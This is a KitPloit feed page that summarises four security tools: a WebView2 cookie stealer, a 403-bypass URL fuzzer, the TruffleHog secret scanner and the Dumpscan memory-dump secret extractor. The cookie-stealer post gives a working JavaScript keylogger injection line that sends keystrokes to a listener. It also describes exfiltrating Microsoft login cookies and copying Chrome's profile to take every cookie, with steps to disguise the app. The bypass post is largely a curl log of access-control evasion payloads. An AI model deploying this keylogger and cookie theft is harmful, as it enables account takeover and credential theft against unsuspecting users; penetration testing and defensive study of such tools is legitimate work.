Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

WebView2-Cookie-Stealer - Attacking With WebView2 Applications

$
0
0


Please read this blog post to get more information.

Source Code

This code is a modified version of Microsoft's WebView2 Code. The current code can be cleaned up and made much better.


Demo

Launch Example



Usage Example



Usage

Tested on Windows 10& 11.

When the binary is executed https://office.com/login is loaded up. A JavaScript keylogger is injected into every page and keystrokes are sent to http://127.0.0.1:8080. Furthermore, upon the user successfully authenticating the cookies for login.microsoftonline.com are base64-encoded and sent to http://127.0.0.1:8080 via an HTTP GET request.

Modifying JavaScript

If you'd like to modify the JavaScript the code that needs to be changed is shown below at line 1096 in AppWindow.cpp.

coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Stealing Chrome Cookies

WebView2 allows you to launch with an existing User Data Folder (UDF) rather than creating a new one. The UDF contains all passwords, sessions, bookmarks etc. Chrome's UDF is located at C:\Users\<username>\AppData\Local\Google\Chrome\User Data. We can simply tell WebView2 to start the instance using this profile and upon launch extract all cookies and transfer them to the attacker's server.

The only catch is that WebView2 looks for a folder called EBWebView instead of User Data (not sure why). Copy the User Data folder and rename it to EBWebView.

Required Changes

  • At line 41 in app.cpp:

    • Change std::wstring userDataFolder(L""); to std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • The specified folder must contain the EBWebView folder which WebView2 will read from.
  • At line 40 in ScenarioCookieManagement.cpp:

    • Change GetCookiesHelper(L"https://login.microsoftonline.com"); to GetCookiesHelper(L"");

When GetCookiesHelper is invoked without any website being provided it will extract all cookies.

Note: This will not work with the current application if there is a large quantity of cookies because the application sends them using a GET Request which has a length limit.

Important Functions

If you'd like to make modifications to the binary you'll find information about the important functions below.

  • AppStartPage.cpp - GetUri() function has the URL that is loaded upon binary execution.
  • ScenarioCookieManagement.cpp - SendCookies() function contains the IP address and port where the cookies are sent.
  • AppWindow.cpp - CallCookieFunction() function waits until the URL starts with https://www.office.com/?auth= and calls ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - Cosmetic changes
    • Remove the menu bar by setting all POPUP values to "".
    • Change IDS_APP_TITLE and IDC_WEBVIEW2APISAMPLE. This is the name of the application in the title bar.
    • Change IDI_WEBVIEW2APISAMPLE and IDI_WEBVIEW2APISAMPLE_INPRIVATE and IDI_SMALL. These point to a .ico file which is the icon for this application.
  • Toolbar.cpp - itemHeight must be set to 0 to remove the top menu. This is already taken care of in this code.
  • AppWindow.cpp - LoadImage() should be commented out. This hides the blue splash image. This is already taken care of in this code.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); change the last param value to true. This hides the toolbar. This is already taken care of in this code.



Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page

$
0
0


Tool that tests MANY url bypasses to reach a 40X protected page.

If you wonder why this code is nothing but a dirty curl wrapper, here's why:

  • Most of the python requests do url/path/parameter encoding/decoding, and I hate this.
  • If I submit raw chars, I want raw chars to be sent.
  • If I send a weird path, I want it weird, not normalized.

This is surprisingly hard to achieve in python without loosing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend, it's gonna be just fine.


Setup for bypass.py

# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"

Usage

Expected result
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 S afari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: % {size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/ api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list 2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Curren t: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w ' \nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'ht tp://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolo kia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat


Trufflehog - Find Credentials All Over The Place

$
0
0

TruffleHog

Find leaked credentials.


Join The Slack

Have questions? Feedback? Jump in slack and hang out with us

https://join.slack.com/t/trufflehog-community/shared_invite/zt-pw2qbi43-Aa86hkiimstfdKH9UCpPzQ

Demo

Find credentials all over the place (6)

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity

What's new in v3?

TruffleHog v3 is a complete rewrite in Go with many new powerful features.

  • We've added over 700 credential detectors that support active verification against their respective APIs.
  • We've also added native support for scanning GitHub, GitLab, filesystems, and S3.
  • Instantly verify private keys against millions of github users and billions of TLS certificates using our Driftwood technology.

What is credential verification?

For every potential credential that is detected, we've painstakingly implemented programatic verification against the API that we think it belongs to. Verification eliminates false positives. For example, the AWS credential detector performs a GetCallerIdentity API call against the AWS API to verify if an AWS credential is active.

Installation

Several options:

1. Go

git clone https://github.com/trufflesecurity/trufflehog.git

cd trufflehog; go install

2. Release binaries

3. Docker

Note: Apple M1 hardware users should run with docker run --platform linux/arm64 for better performance.

Most users

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys

Apple M1 users

The linux/arm64 image is better to run on the M1 than the amd64 image. Even better is running the native darwin binary avilable, but there is not container image for that.

docker run --platform linux/arm64 -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys 

4. Pip (help wanted)

It's possible to distribute binaries in pip wheels.

Here is an example of a project that does it.

Help with setting up this packaging would be appreciated!

5. Brew

brew tap trufflesecurity/trufflehog
brew install trufflehog

Usage

TruffleHog has a sub-command for each source of data that you may want to scan:

  • git
  • github
  • gitlab
  • S3
  • filesystem
  • syslog
  • file and stdin (coming soon)

Each subcommand can have options that you can see with the -h flag provided to the sub command:

$ trufflehog git --help
usage: TruffleHog git [<flags>] <uri>

Find credentials in git repositories.

Flags:
--help Show context-sensitive help (also try --help-long and --help-man).
--debug Run in debug mode
--version Prints trufflehog version.
-j, --json Output in JSON format.
--json-legacy Use the pre-v3.0 JSON format. Only works with git, gitlab, and github sources.
--concurrency=1 Number of concurrent workers.
--no-verification Don't verify the results.
--only-verified Only output verified results.
--print-avg-detector-time Print the average time spent on each detector.
--no-update Don't check for updates.
-i, --include-paths=INCLUDE-PATHS
Path to file with newline separated regexes for files to include in scan.
-x, --exclude-paths=EXCLUDE-PATHS
Path to file with newline separated regexes for files to exclude in scan.
--since-commit=SINCE-COMMIT
Commit to start scan from.
--branch=BRANCH Branch to scan.
--max-depth=MAX-DEPTH Maximum depth of commits to scan.
--allow No-op flag for backwards compat.
--entropy No-op flag for backwards compat.
--regex No-op flag for backwards compat.

Args:
<uri> Git repository URL. https:// or file:// schema expected.

For example, to scan a git repository, start with

$ trufflehog git https://github.com/trufflesecurity/trufflehog.git

Exit Codes:

  • 0: No errors and no results were found.
  • 1: An error was encountered. Sources may not have completed scans.
  • 183: No errors were encountered, but results were found. Will only be returned if --fail flag is used.

Scanning an organization

Try scanning an entire GitHub organization with the following:

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity

TruffleHog OSS Github Action

- name: TruffleHog OSS
uses: trufflesecurity/trufflehog@main
with:
# Repository path
path:
# Start scanning from here (usually main branch).
base:
# Scan commits until here (usually dev branch).
head: # optional

The TruffleHog OSS Github Action can be used to scan a range of commits for leaked credentials. The action will fail if any results are found.

For example, to scan the contents of pull requests you could use the following workflow:

name: Leaked Secrets Scan
on: [pull_request]
jobs:
TruffleHog:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: TruffleHog OSS
uses: trufflesecurity/trufflehog@v3.4.3
with:
path: ./
base: ${{ github.event.repository.default_branch }}
head: HEAD

Contributors

This project exists thanks to all the people who contribute. [Contribute].

Contributing

Contributions are very welcome! Please see our contribution guidelines first.

We no longer accept contributions to TruffleHog v2, but that code is available in the v2 branch.

Adding new secret detectors

We have published some documentation and tooling to get started on adding new secret detectors. Let's improve detection together!

License Change

Since v3.0, TruffleHog is released under a AGPL 3 license, included in LICENSE. TruffleHog v3.0 uses none of the previous codebase, but care was taken to preserve backwards compatibility on the command line interface. The work previous to this release is still available licensed under GPL 2.0 in the history of this repository and the previous package releases and tags. A completed CLA is required for us to accept contributions going forward.



Dumpscan - Tool To Extract And Dump Secrets From Kernel And Windows Minidump Formats

$
0
0


Dumpscan is a command-line tool designed to extract and dump secrets from kernel and Windows Minidump formats. Kernel-dump parsing is provided by volatility3.


Features

  • x509 Public and Private key (PKCS #8/PKCS #1) parsing
  • SymCrypt parsing
    • Supported structures
      • SYMCRYPT_RSAKEY - Determines if the key structure also has a private key
    • Matching to public certificates found in the same process
    • More SymCrypt structures to come
  • Environment variables
  • Command line arguments

Note: Testing has only been performed on Windows 10 and 11 64-bit hosts and processes. Feel free to file an issue for additional versions. Linux testing TBD.

Installation

As a command-line tool, installation is recommended using pipx. This allows for easy updates and well and ensuring it is installed in its own virtual environment.

pipx install dumpscan
pipx inject dumpscan git+https://github.com/volatilityfoundation/volatility3#39e812a

Usage

 Usage: dumpscan [OPTIONS] COMMAND [ARGS]...

Scan memory dumps for secrets and keys

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. &#9474 ;
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ kernel Scan kernel dump using volatility │
│ minidump Scan a user-mode minidump │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

In the case for subcommands that extract certificates, you can provide --output/-o <dir> to output any discovered certificates to disk.

Kernel Mode

As mentioned, kernel analysis is performed by Volatility3. cmdline, envar, and pslist are direct calls to the Volatility3 plugins, while symcrypt and x509 are custom plugins.

 Usage: dumpscan kernel [OPTIONS] COMMAND [ARGS]...

Scan kernel dump using volatility

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. ╰
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ cmdline List command line for processes (Only for Windows) │
│ envar List process environment variables (Only for Windows) │
│ pslist List all the processes and their command lin e arguments │
│ symcrypt Scan a kernel-mode dump for symcrypt objects │
│ x509 Scan a kernel-mode dump for x509 certificates │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

Minidump Mode

Supports Windows Minidump format.

Note: This has only been tested on 64-bit processes on Windows 10+. 32-bit processes requires additional work but isn't a priority.

 Usage: dumpscan minidump [OPTIONS] COMMAND [ARGS]...

Scan a user-mode minidump

╭─ Options ────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ --help Show this message and exit. │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ cmdline Dump the command line string │
│ envar Dump the environment variables in a minidump │
│ symcrypt Scan a minidump for symcrypt objects │
│ x509 Scan a minidump for x509 objects │
│ │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

Built With

Acknowledgements

  • Thanks to F-Secure and the physmem2profit project for providing the idea to use construct for parsing minidumps.
  • Thanks to Skelsec and his minidump project which helped me figure out to parse minidumps.

To-Do

  • Verify use against 32-bit minidumps
  • Create a coredump parser for Linux process dumps
